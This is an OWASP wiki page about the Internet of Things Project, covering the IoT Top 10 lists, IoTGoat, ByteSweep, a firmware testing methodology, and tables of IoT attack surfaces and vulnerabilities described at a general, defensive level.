https://wiki.owasp.org/api.php?action=feedcontributions&user=Aaron.guzman&feedformat=atomOWASP - User contributions [en]2024-03-29T07:30:37ZUser contributionsMediaWiki 1.27.2https://wiki.owasp.org/index.php?title=OWASP_Internet_of_Things_Project&diff=255839OWASP Internet of Things Project2019-11-01T07:02:32Z<p>Aaron.guzman: </p>
<hr />
<div>= Main =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
== OWASP Internet of Things (IoT) Project ==<br />
Oxford defines the Internet of Things as: “A proposed development of the Internet in which everyday objects have network connectivity, allowing them to send and receive data.”<br />
<br />
''The OWASP Internet of Things Project is designed to help manufacturers, developers, and consumers better understand the security issues associated with the Internet of Things, and to enable users in any context to make better security decisions when building, deploying, or assessing IoT technologies''. <br />
<br />
The project looks to define a structure for various IoT sub-projects separated into the following categories - Seek & Understand, Validate & Test, and Governance.<br />
<br />
==Updated!==<br />
<br />
The OWASP IoT Project for 2018 has been released![[File:OWASP 2018 IoT Top10 Final.jpg|center|thumb|1301x1301px]]<br />
<br />
== Philosophy ==<br />
The OWASP Internet of Things Project was started in 2014 as a way help Developers, Manufacturers, Enterprises, and Consumers to make better decisions regarding the creation and use of IoT systems.<br />
<br />
This continues today with the 2018 release of the OWASP IoT Top 10, which represents the top ten things to avoid when building, deploying, or managing IoT systems. The primary theme for the 2018 OWASP Internet of Things Top 10 is simplicity. Rather than having separate lists for risks vs. threats vs. vulnerabilities—or for developers vs. enterprises vs. consumers—the project team elected to have a single, unified list that captures the top things to avoid when dealing with IoT Security.<br />
<br />
The team recognized that there are now dozens of organizations releasing elaborate guidance on IoT Security—all of which are designed for slightly different audiences and industry verticals. We thought the most useful resource we could create is a single list that addresses the highest priority issues for manufacturers, enterprises, and consumers at the same time.<br />
<br />
The result is the [https://www.owasp.org/images/1/1c/OWASP-IoT-Top-10-2018-final.pdf 2018 OWASP IoT Top 10].<br />
<br />
== Methodology ==<br />
The project team is a collection of volunteer professionals from within the security industry, with experience spanning multiple areas of expertise, including: manufacturers, consulting, security testers, developers, and many more.<br />
<br />
The project was conducted in the following phases:<br />
# '''Team Formation''': finding people who would be willing to contribute to the 2018 update, both as SMEs and as project leaders to perform various tasks within the duration of the project.<br />
# '''Project Review:''' analysis of the 2014 project to determine what’s changed in the industry since that release, and how the list should be updated given those changes.<br />
# '''Data Collection''': collection and review of multiple vulnerability sources (both public and private), with special emphasis on which issues caused the most actual impact and damage.<br />
# '''Sister Project Review''': a review of dozens of other IoT Security projects to ensure that we’d not missed something major and that we were comfortable with both the content and prioritization of our release. Examples included: [https://cloudsecurityalliance.org/artifacts/csa-iot-controls-matrix/ CSA IoT Controls Matrix], [https://api.ctia.org/wp-content/uploads/2018/08/CTIA-IoT-Cybersecurity-Certification-Test-Plan-V1_0.pdf CTIA], [http://iot.stanford.edu/ Stanford’s Secure Internet of Things Project], [https://nvlpubs.nist.gov/nistpubs/ir/2018/NIST.IR.8200.pdf NISTIR 8200], [https://www.enisa.europa.eu/publications/baseline-security-recommendations-for-iot/at_download/fullReport ENISA IoT Baseline Report], [https://assets.publishing.service.gov.uk/government/uploads/system/uploads/attachment_data/file/747413/Code_of_Practice_for_Consumer_IoT_Security_October_2018.pdf Code of Practice for Consumer IoT Security,] and others.<br />
# '''Community Draft Feedback''': release of the draft to the community for review, including multiple Twitter calls for comments, the use of a public feedback form, and a number of public talks where feedback was gathered. The feedback was then reviewed by the team along with initial Data Collection, as well as Sister Project Review, to create the list contents and prioritization.<br />
# '''Release:''' release of the project to the public in December 2018.<br />
<br />
== The Future of the OWASP IoT Top 10 ==<br />
The team has a number of activities planned to continue improving on the project going forward.<br />
<br />
Some of the items being discussed include:<br />
* Continuing to improve the list on a two-year cadence, incorporating feedback from the community and from additional project contributors to ensure we are staying current with issues facing the industry.<br />
* Mapping the list items to other OWASP projects, such as the ASVS, and perhaps to other projects outside OWASP as well.<br />
* Expanding the project into other aspects of IoT—including embedded security, ICS/ SCADA,etc.<br />
* Adding use and abuse cases, with multiple examples, to solidify each concept discussed.<br />
* Considering the addition of reference architectures, so we can not only tell people what to avoid, but how to do what they need to do securely.<br />
<br />
Participation in the OWASP IoT Project is open to the community. We take input from all participants — whether you’re a developer, a manufacturer, a penetration tester, or someone just trying to implement IoT securely. You can find the team meeting every other Friday in the the #iot-security room of the OWASP Slack Channel.<br />
<br />
'''''The OWASP IoT Security Team, 2018'''''<br />
<br />
==Licensing==<br />
The OWASP Internet of Things Project is free to use. It is licensed under the http://creativecommons.org/licenses/by-sa/3.0/ Creative Commons Attribution-ShareAlike 3.0 license], so you can copy, distribute and transmit the work, and you can adapt it, and use it commercially, but all provided that you attribute the work and if you alter, transform, or build upon this work, you may distribute the resulting work only under the same or similar license to this one.<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:200px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the OWASP Internet of Things Project? ==<br />
<br />
The OWASP Internet of Things Project provides information on:<br />
<br />
* [https://www.owasp.org/index.php/IoT_Attack_Surface_Areas IoT Attack Surface Areas]<br />
* IoT Vulnerabilities<br />
* Firmware Analysis<br />
* ICS/SCADA Software Weaknesses<br />
* Community Information<br />
* [https://www.owasp.org/index.php/IoT_Testing_Guides IoT Testing Guides]<br />
* [https://www.owasp.org/index.php/IoT_Security_Guidance IoT Security Guidance]<br />
* [https://www.owasp.org/index.php/Principles_of_IoT_Security Principles of IoT Security]<br />
* [https://www.owasp.org/index.php/IoT_Framework_Assessment IoT Framework Assessment]<br />
* Developer, Consumer and Manufacturer Guidance<br />
* Design Principles<br />
* IoTGoat<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
* Craig Smith<br />
* Vishruta Rudresh<br />
* Aaron Guzman<br />
<br />
== Contributors ==<br />
* [https://www.owasp.org/index.php/User:Justin_C._Klein_Keane Justin Klein Keane]<br />
* Saša Zdjelar<br />
<br />
== IoT Top 2018 Contributors ==<br />
* Vijayamurugan Pushpanathan <br />
* Alexander Lafrenz <br />
* Masahiro Murashima <br />
* Charlie Worrell <br />
* José A. Rivas (jarv) <br />
* Pablo Endres <br />
* Ade Yoseman <br />
* Cédric Levy-Bencheotn<br />
* Jason Andress<br />
* Amélie Didion - Designer<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Project|OWASP Project Repository]]<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
* [https://www.owasp.org/index.php/OWASP_Embedded_Application_Security OWASP Embedded Application Security]<br />
* [https://www.owasp.org/index.php/C-Based_Toolchain_Hardening OWASP C-based Toolchain Hardening]<br />
<br />
| style="padding-left:25px;width:200px;" valign="top" |<br />
<br />
== Collaboration ==<br />
[https://owasp.slack.com The OWASP Slack Channel]<br />
<br />
Hint: If you're new to Slack, [https://lists.owasp.org/pipermail/owasp-community/2015-July/000703.html join OWASP's slack channel first], then join #iot-security within OWASP's channel.<br />
<br />
== Quick Download ==<br />
[https://www.owasp.org/images/1/1c/OWASP-IoT-Top-10-2018-final.pdf OWASP IoT Top Ten 2018]<br />
<br />
[https://www.owasp.org/images/3/36/IoTTestingMethodology.pdf IoT Attack Surface Mapping DEFCON 23]<br />
<br />
[https://www.owasp.org/images/2/2d/Iot_testing_methodology.JPG IoT Testing Guidance Handout]<br />
<br />
[https://www.owasp.org/images/7/71/Internet_of_Things_Top_Ten_2014-OWASP.pdf OWASP IoT Top Ten 2014 PDF]<br />
<br />
[https://www.owasp.org/images/b/bd/OWASP-IoT.pptx OWASP IoT Project Overview]<br />
<br />
== News and Events ==<br />
* OWASP [https://www.owasp.org/index.php/OWASP_Internet_of_Things_Project#tab=IoTGoat IoTGoat Project] underway<br />
* New firmware security analysis tool, ByteSweep<br />
* IoT ASVS and Testing Guide set to kick off in 2019<br />
* Added a [https://owasp-iot-security.slack.com/ Slack channel]<br />
* Added a sub-project; [https://www.owasp.org/index.php/OWASP_Internet_of_Things_Project#tab=IoT_Security_Policy_Project IoT Security Policy Project]<br />
<br />
==Classifications==<br />
<br />
{| width="200" cellpadding="2"<br />
|-<br />
| rowspan="2" width="50%" valign="top" align="center" | [[File:Owasp-incubator-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]<br />
| width="50%" valign="top" align="center" | [[File:Owasp-builders-small.png|link=]] <br />
|-<br />
| width="50%" valign="top" align="center" | [[File:Owasp-defenders-small.png|link=]]<br />
|-<br />
| colspan="2" align="center" | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]]<br />
|-<br />
| colspan="2" align="center" | [[File:Project_Type_Files_DOC.jpg|link=]]<br />
|}<br />
<br />
|}<br />
<br />
= IoT Top 10 =<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
== Internet of Things (IoT) Top 10 2018 ==<br />
The [https://www.owasp.org/images/1/1c/OWASP-IoT-Top-10-2018-final.pdf OWASP IoT Top 10 - 2018] is now available.<br />
* I1 Weak Guessable, or Hardcoded Passwords<br />
<br />
* I2 Insecure Network Services<br />
<br />
* I3 Insecure Ecosystem Interfaces<br />
<br />
* I4 Lack of Secure Update Mechanism<br />
<br />
* I5 Use of Insecure or Outdated Components<br />
<br />
* I6 Insufficient Privacy Protection<br />
<br />
* I7 Insecure Data Transfer and Storage<br />
<br />
* I8 Lack of Device Management<br />
<br />
* I9 Insecure Default Settings<br />
<br />
* I10 Lack of Physical Hardening<br />
== Internet of Things (IoT) Top 10 2014 ==<br />
* [[Top 10 2014-I1 Insecure Web Interface|I1 Insecure Web Interface]]<br />
* [[Top 10 2014-I2 Insufficient Authentication/Authorization|I2 Insufficient Authentication/Authorization]]<br />
* [[Top 10 2014-I3 Insecure Network Services|I3 Insecure Network Services]]<br />
* [[Top 10 2014-I4 Lack of Transport Encryption|I4 Lack of Transport Encryption]]<br />
* [[Top 10 2014-I5 Privacy Concerns|I5 Privacy Concerns]]<br />
* [[Top 10 2014-I6 Insecure Cloud Interface|I6 Insecure Cloud Interface]]<br />
* [[Top 10 2014-I7 Insecure Mobile Interface|I7 Insecure Mobile Interface]]<br />
* [[Top 10 2014-I8 Insufficient Security Configurability|I8 Insufficient Security Configurability]]<br />
* [[Top 10 2014-I9 Insecure Software/Firmware|I9 Insecure Software/Firmware]]<br />
* [[Top 10 2014-I10 Poor Physical Security|I10 Poor Physical Security]]<br />
<br />
= OWASP IoT Top 10 2018 Mapping Project =<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Top 10 2018 Mapping Project ==<br />
<br />
The OWASP IoT Mapping Project is intended to provide a mapping of the OWASP IoT Top 10 2018 to industry publications and sister projects. The goal is to provide resources that enable practical uses for the OWASP IoT Top 10 . As with all Top 10 lists, they should be used as a first step and expanded upon according to the applicable IoT ecosystem. <br />
<br />
Mappings are structured with control categories, tests, or recommendations in the left column, descriptions in the middle column, and their mapping to the OWASP IoT Top 10 2018 list in the right column. Each mapping may not have a 1 to 1 relation; however, similar recommendations and/or controls are listed. For mappings that are not applicable to the IoT Top 10 2018 list, an "N/A" is provided as the mapping.<br />
<br />
An example mapping of the IoT Top 10 2014 is provided below. <br />
<br />
[[File:2014 2018Mapping.png|center|frameless|746x746px]]<br />
<br />
For additional mappings, please visit the following link: https://scriptingxss.gitbook.io/owasp-iot-top-10-mapping-project/<nowiki/>{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the IoT Top 10 Mapping Project? ==<br />
<br />
The OWASP IoT Mapping Project is intended to provide a mapping of the OWASP IoT Top 10 2018 to industry publications and sister projects. The goal is to provide resources that enable practical uses for the OWASP IoT Top 10 . As with all Top 10 lists, they should be used as a first step and expanded upon according to the applicable IoT ecosystem. <br />
<br />
Mappings include the following:<br />
* [https://scriptingxss.gitbook.io/owasp-iot-top-10-mapping-project/mappings/owasp-iot-top-10-2014 OWASP IoT Top 10 2014]<br />
* [https://scriptingxss.gitbook.io/owasp-iot-top-10-mapping-project/mappings/gsma-iot-security-assessment-checklist GSMA IoT Security Assessment Checklist]<br />
* [https://scriptingxss.gitbook.io/owasp-iot-top-10-mapping-project/mappings/code-of-practice Code of Practice (UK Government)]<br />
* [https://scriptingxss.gitbook.io/owasp-iot-top-10-mapping-project/mappings/enisa-baseline-security-recommendations-for-iot ENISA Baseline Security Recommendations for IoT]<br />
<br />
and more...<br />
<br />
== GitBook ==<br />
Mappings are hosted on GitBook using the following link https://scriptingxss.gitbook.io/owasp-iot-top-10-mapping-project/<br />
<br />
== Project Leaders ==<br />
<br />
* Aaron Guzman<br />
<br />
== Collaboration ==<br />
[https://owasp.slack.com The Slack Channel]<br />
<br />
|}<br />
<br />
= IoTGoat =<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoTGoat Project ==<br />
<br />
IoT Goat is a deliberately insecure firmware based on OpenWrt. The project’s goal is to teach users about the most common vulnerabilities typically found in IoT devices. The vulnerabilities will be based on the top 10 vulnerabilities as documented by OWASP: [[OWASP_Internet_of_Things_Project|https://www.owasp.org/index.php/OWASP_Internet_of_Things_Project]]. IoTGoat is expected to be released by December 2019. <br />
<br />
To get more information on getting started or how to contribute, visit the project's Github: https://github.com/scriptingxss/IoTGoat<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the IoTGoat Project? ==<br />
<br />
The IoTGoat Project is a deliberately insecure firmware based on OpenWrt. The project’s goal is to teach users about the most common vulnerabilities typically found in IoT devices. The vulnerabilities will be based on the IoT Top 10.<br />
<br />
== GitHub ==<br />
https://github.com/scriptingxss/IoTGoat<br />
<br />
== Project Leaders ==<br />
<br />
* Aaron Guzman<br />
* Fotios Chantzis<br />
* [[User:Calderpwn|Paulino Calderon]]<br />
<br />
== Related Projects ==<br />
<br />
* WebGoat<br />
* Serverless Goat<br />
* NodeGoat<br />
* RailsGoat<br />
<br />
== Collaboration ==<br />
[https://owasp.slack.com The Slack Channel]<br />
<br />
[https://groups.google.com/forum/#!forum/iotgoat IoTGoat Google Group]<br />
<br />
== Quick Download ==<br />
* [https://docs.google.com/presentation/d/1SJfabCBxvC3GWnmBCqisO5pyLzkB1-EVcR7s8baT0dE/edit?usp=sharing Project Kick-off Slides]<br />
* [https://strozfriedberg.webex.com/recordingservice/sites/strozfriedberg/recording/playback/5529b228ac514bed8cc050a9dee0f0df Project Kick-off Meeting]<br />
* [https://docs.google.com/spreadsheets/d/1KXX2K7ikkve6wmdfAVu-sZONgKEBuAkRij_paJUgX2w/edit?usp=sharing Project Task List]<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= ByteSweep =<br />
[[File:OWASP_Project_Header.jpg|link=]]<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== ByteSweep Project ==<br />
<br />
ByteSweep is a Free Software IoT security analysis platform. This platform will allow IoT device makers, large and small, to conduct fully automated security checks before they ship firmware. A Free Software IoT Firmware Security Analysis Platform<br />
<br />
ByteSweep Features:<br />
* Firmware extraction<br />
* File data enrichment<br />
* Key and password hash identification<br />
* Unsafe function use detection<br />
* 3rd party component identification<br />
* CVE correlation<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the ByteSweep Project? ==<br />
<br />
A Free Software IoT Firmware Security Analysis Platform.<br />
<br />
== GitLab ==<br />
https://gitlab.com/bytesweep/bytesweep<br />
<br />
== Project Leaders ==<br />
<br />
* Matt Brown<br />
<br />
== Collaboration ==<br />
[https://owasp.slack.com The Slack Channel]<br />
<br />
== Quick Download ==<br />
* https://gitlab.com/bytesweep/bytesweep/blob/master/INSTALL.md<br />
<br />
|}<br />
<br />
= Firmware Security Testing Methodology =<br />
[[File:OWASP_Project_Header.jpg|link=]]<br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== Firmware Security Testing Methodology ==<br />
<br />
The Firmware Security Testing Methodology (FSTM) is composed of nine stages tailored to enable security researchers, software developers, consultants, hobbyists, and Information Security professionals with conducting firmware security assessments.<br />
<br />
{| class="wikitable"<br />
|'''Stage'''<br />
|'''Description'''<br />
|-<br />
|1. Information gathering and reconnaissance<br />
|Acquire all relative technical and documentation details pertaining to the target device’s firmware<br />
|-<br />
|2. Obtaining firmware<br />
|Attain firmware using one or more of the proposed methods listed<br />
|-<br />
|3. Analyzing firmware<br />
|Examine the target firmware’s characteristics<br />
|-<br />
|4. Extracting the filesystem<br />
|Carve filesystem contents from the target firmware<br />
|-<br />
|5. Analyzing filesystem contents<br />
|Statically analyze extracted filesystem configuration files and binaries for vulnerabilities <br />
|-<br />
|6. Emulating firmware<br />
|Emulate firmware files and components<br />
|-<br />
|7. Dynamic analysis<br />
|Perform dynamic security testing against firmware and application interfaces<br />
|-<br />
|8. Runtime analysis<br />
|Analyze compiled binaries during device runtime<br />
|-<br />
|9. Binary Exploitation<br />
|Exploit identified vulnerabilities discovered in previous stages to attain root and/or code execution<br />
|}The full methodology release can be downloaded via the following https://github.com/scriptingxss/owasp-fstm/releases/download/v1.0/Firmware_Security_Testing_Methodology_Version1.pdf. <br />
<br />
{{Social Media Links}} <br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the Firmware Security Testing Methodology ==<br />
<br />
The Firmware Security Testing Methodology Project provides:<br />
<br />
*Attack walkthroughs<br />
*Tool usage examples<br />
*Screenshots<br />
*Companion virtual machine preloaded with tools (EmbedOS) - <nowiki>https://github.com/scriptingxss/EmbedOS</nowiki> <br />
<br />
== Project Leaders ==<br />
<br />
* Aaron Guzman<br />
<br />
== Quick Download ==<br />
* https://github.com/scriptingxss/owasp-fstm/releases<br />
<br />
|}<br />
<br />
= IoT Attack Surface Areas =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Attack Surface Areas Project ==<br />
<br />
The OWASP IoT Attack Surface Areas (DRAFT) are as follows:<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Attack Surface<br />
! Vulnerability<br />
|- <br />
| '''Ecosystem (general)'''<br />
|<br />
* Interoperability standards<br />
* Data governance<br />
* System wide failure<br />
* Individual stakeholder risks<br />
* Implicit trust between components<br />
* Enrollment security<br />
* Decommissioning system<br />
* Lost access procedures<br />
|- <br />
| '''Device Memory'''<br />
|<br />
* Sensitive data<br />
** Cleartext usernames<br />
** Cleartext passwords<br />
** Third-party credentials<br />
** Encryption keys<br />
|- <br />
| '''Device Physical Interfaces'''<br />
|<br />
* Firmware extraction<br />
* User CLI<br />
* Admin CLI<br />
* Privilege escalation<br />
* Reset to insecure state<br />
* Removal of storage media<br />
* Tamper resistance<br />
* Debug port<br />
** UART (Serial)<br />
** JTAG / SWD<br />
* Device ID/Serial number exposure<br />
|-<br />
| '''Device Web Interface'''<br />
|<br />
* Standard set of web application vulnerabilities, see:<br />
** [[:Category:OWASP Top Ten Project|OWASP Web Top 10]]<br />
** [[:Category:OWASP Application Security Verification Standard Project|OWASP ASVS]]<br />
** [[:Category:OWASP Testing Project|OWASP Testing guide]]<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Device Firmware'''<br />
|<br />
* Sensitive data exposure ([[Top 10 2013-A6-Sensitive Data Exposure|See OWASP Top 10 - A6 Sensitive data exposure]]):<br />
** Backdoor accounts<br />
** Hardcoded credentials<br />
** Encryption keys<br />
** Encryption (Symmetric, Asymmetric)<br />
** Sensitive information<br />
** Sensitive URL disclosure<br />
* Firmware version display and/or last update date<br />
* Vulnerable services (web, ssh, tftp, etc.)<br />
** Verify for old sw versions and possible attacks (Heartbleed, Shellshock, old PHP versions etc)<br />
* Security related function API exposure<br />
* Firmware downgrade possibility<br />
|- <br />
| '''Device Network Services'''<br />
|<br />
* Information disclosure<br />
* User CLI<br />
* Administrative CLI<br />
* Injection<br />
* Denial of Service<br />
* Unencrypted Services<br />
* Poorly implemented encryption<br />
* Test/Development Services<br />
* Buffer Overflow<br />
* UPnP<br />
* Vulnerable UDP Services<br />
* DoS<br />
* Device Firmware OTA update block<br />
* Firmware loaded over insecure channel (no TLS)<br />
* Replay attack<br />
* Lack of payload verification<br />
* Lack of message integrity check<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Administrative Interface'''<br />
|<br />
* Standard set of web application vulnerabilities, see:<br />
** [[:Category:OWASP Top Ten Project|OWASP Web Top 10]]<br />
** [[:Category:OWASP Application Security Verification Standard Project|OWASP ASVS]]<br />
** [[:Category:OWASP Testing Project|OWASP Testing guide]]<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Security/encryption options<br />
* Logging options<br />
* Two-factor authentication<br />
* Check for insecure direct object references<br />
* Inability to wipe device<br />
|- <br />
| '''Local Data Storage'''<br />
|<br />
* Unencrypted data<br />
* Data encrypted with discovered keys<br />
* Lack of data integrity checks<br />
* Use of static same enc/dec key<br />
|- <br />
| '''Cloud Web Interface'''<br />
|<br />
<br />
* Standard set of web application vulnerabilities, see:<br />
** [[:Category:OWASP Top Ten Project|OWASP Web Top 10]]<br />
** [[:Category:OWASP Application Security Verification Standard Project|OWASP ASVS]]<br />
** [[:Category:OWASP Testing Project|OWASP Testing guide]]<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Transport encryption<br />
* Two-factor authentication<br />
|- <br />
| '''Third-party Backend APIs'''<br />
|<br />
* Unencrypted PII sent<br />
* Encrypted PII sent<br />
* Device information leaked<br />
* Location leaked<br />
|- <br />
| '''Update Mechanism'''<br />
|<br />
* Update sent without encryption<br />
* Updates not signed<br />
* Update location writable<br />
* Update verification<br />
* Update authentication<br />
* Malicious update<br />
* Missing update mechanism<br />
* No manual update mechanism<br />
|- <br />
| '''Mobile Application'''<br />
|<br />
* Implicitly trusted by device or cloud<br />
* Username enumeration<br />
* Account lockout<br />
* Known default credentials<br />
* Weak passwords<br />
* Insecure data storage<br />
* Transport encryption<br />
* Insecure password recovery mechanism<br />
* Two-factor authentication<br />
|- <br />
| '''Vendor Backend APIs'''<br />
|<br />
* Inherent trust of cloud or mobile application<br />
* Weak authentication<br />
* Weak access controls<br />
* Injection attacks<br />
* Hidden services<br />
|- <br />
| '''Ecosystem Communication'''<br />
|<br />
* Health checks<br />
* Heartbeats<br />
* Ecosystem commands<br />
* Deprovisioning<br />
* Pushing updates<br />
|- <br />
| '''Network Traffic'''<br />
|<br />
* LAN<br />
* LAN to Internet<br />
* Short range<br />
* Non-standard<br />
* Wireless (WiFi, Z-wave, XBee, Zigbee, Bluetooth, LoRA)<br />
* Protocol fuzzing<br />
|- <br />
| '''Authentication/Authorization'''<br />
|<br />
* Authentication/Authorization related values (session key, token, cookie, etc.) disclosure<br />
* Reusing of session key, token, etc.<br />
* Device to device authentication<br />
* Device to mobile Application authentication<br />
* Device to cloud system authentication<br />
* Mobile application to cloud system authentication<br />
* Web application to cloud system authentication<br />
* Lack of dynamic authentication<br />
|-<br />
| '''Privacy'''<br />
|<br />
* User data disclosure<br />
* User/device location disclosure<br />
* Differential privacy<br />
|-<br />
| '''Hardware (Sensors)'''<br />
|<br />
* Sensing Environment Manipulation<br />
* Tampering (Physically)<br />
* Damage (Physicall)<br />
<br />
|-<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the IoT Attack Surface Areas Project? ==<br />
<br />
The IoT Attack Surface Areas Project provides a list of attack surfaces that should be understood by manufacturers, developers, security researchers, and those looking to deploy or implement IoT technologies within their organizations.<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
* Craig Smith<br />
<br />
== Related Projects ==<br />
<br />
* [https://www.owasp.org/index.php/OWASP_Mobile_Security_Project The OWASP Mobile Top 10 Project]<br />
* [https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project The OWASP Web Top 10 Project]<br />
<br />
== Collaboration ==<br />
[https://owasp.slack.com The Slack Channel]<br />
<br />
== Quick Download ==<br />
* Coming Soon<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= IoT Vulnerabilities =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Vulnerabilities Project ==<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Vulnerability<br />
! Attack Surface<br />
! Summary<br />
|-<br />
| '''Username Enumeration'''<br />
|<br />
* Administrative Interface<br />
* Device Web Interface<br />
* Cloud Interface<br />
* Mobile Application<br />
|<br />
* Ability to collect a set of valid usernames by interacting with the authentication mechanism<br />
|-<br />
| '''Weak Passwords'''<br />
|<br />
* Administrative Interface<br />
* Device Web Interface<br />
* Cloud Interface<br />
* Mobile Application<br />
|<br />
* Ability to set account passwords to '1234' or '123456' for example.<br />
* Usage of pre-programmed default passwords<br />
|-<br />
| '''Account Lockout'''<br />
|<br />
* Administrative Interface<br />
* Device Web Interface<br />
* Cloud Interface<br />
* Mobile Application<br />
|<br />
* Ability to continue sending authentication attempts after 3 - 5 failed login attempts<br />
|-<br />
| '''Unencrypted Services'''<br />
|<br />
* Device Network Services<br />
|<br />
* Network services are not properly encrypted to prevent eavesdropping or tampering by attackers<br />
|-<br />
| '''Two-factor Authentication'''<br />
|<br />
* Administrative Interface<br />
* Cloud Web Interface<br />
* Mobile Application<br />
|<br />
* Lack of two-factor authentication mechanisms such as a security token or fingerprint scanner<br />
|-<br />
| '''Poorly Implemented Encryption'''<br />
|<br />
* Device Network Services<br />
|<br />
* Encryption is implemented however it is improperly configured or is not being properly updated, e.g. using SSL v2 <br />
|-<br />
| '''Update Sent Without Encryption'''<br />
|<br />
* Update Mechanism<br />
|<br />
* Updates are transmitted over the network without using TLS or encrypting the update file itself<br />
|-<br />
| '''Update Location Writable'''<br />
|<br />
* Update Mechanism<br />
|<br />
* Storage location for update files is world writable potentially allowing firmware to be modified and distributed to all users<br />
|-<br />
| '''Denial of Service'''<br />
|<br />
* Device Network Services<br />
|<br />
* Service can be attacked in a way that denies service to that service or the entire device<br />
|-<br />
| '''Removal of Storage Media'''<br />
|<br />
* Device Physical Interfaces<br />
|<br />
* Ability to physically remove the storage media from the device<br />
|-<br />
| '''No Manual Update Mechanism'''<br />
|<br />
* Update Mechanism<br />
|<br />
* No ability to manually force an update check for the device<br />
|-<br />
| '''Missing Update Mechanism'''<br />
|<br />
* Update Mechanism<br />
|<br />
* No ability to update device<br />
|-<br />
| '''Firmware Version Display and/or Last Update Date'''<br />
|<br />
* Device Firmware<br />
|<br />
* Current firmware version is not displayed and/or the last update date is not displayed<br />
|-<br />
| '''Firmware and storage extraction'''<br />
|<br />
* JTAG / SWD interface<br />
* [https://www.flashrom.org/Flashrom In-Situ dumping]<br />
* Intercepting a OTA update<br />
* Downloading from the manufacturers web page<br />
* [https://www.exploitee.rs/index.php/Exploitee.rs_Low_Voltage_e-MMC_Adapter eMMC tapping]<br />
* Unsoldering the SPI Flash / eMMC chip and reading it in a adapter<br />
|<br />
* Firmware contains a lot of useful information, like source code and binaries of running services, pre-set passwords, ssh keys etc. <br />
|-<br />
| '''Manipulating the code execution flow of the device'''<br />
|<br />
* JTAG / SWD interface<br />
* [https://wiki.newae.com/Main_Page Side channel attacks like glitching]<br />
|<br />
* With the help of a JTAG adapter and gdb we can modify the execution of firmware in the device and bypass almost all software based security controls.<br />
* Side channel attacks can also modify the execution flow or can be used to leak interesting information from the device<br />
|-<br />
| '''Obtaining console access'''<br />
|<br />
* Serial interfaces (SPI / UART)<br />
|<br />
* By connecting to a serial interface, we will obtain full console access to a device<br />
* Usually security measures include custom bootloaders that prevent the attacker from entering single user mode, but that can also be bypassed.<br />
|-<br />
| '''Insecure 3rd party components'''<br />
|<br />
* Software<br />
|<br />
* Out of date versions of busybox, openssl, ssh, web servers, etc.<br />
|-<br />
<br />
|}<br />
<br />
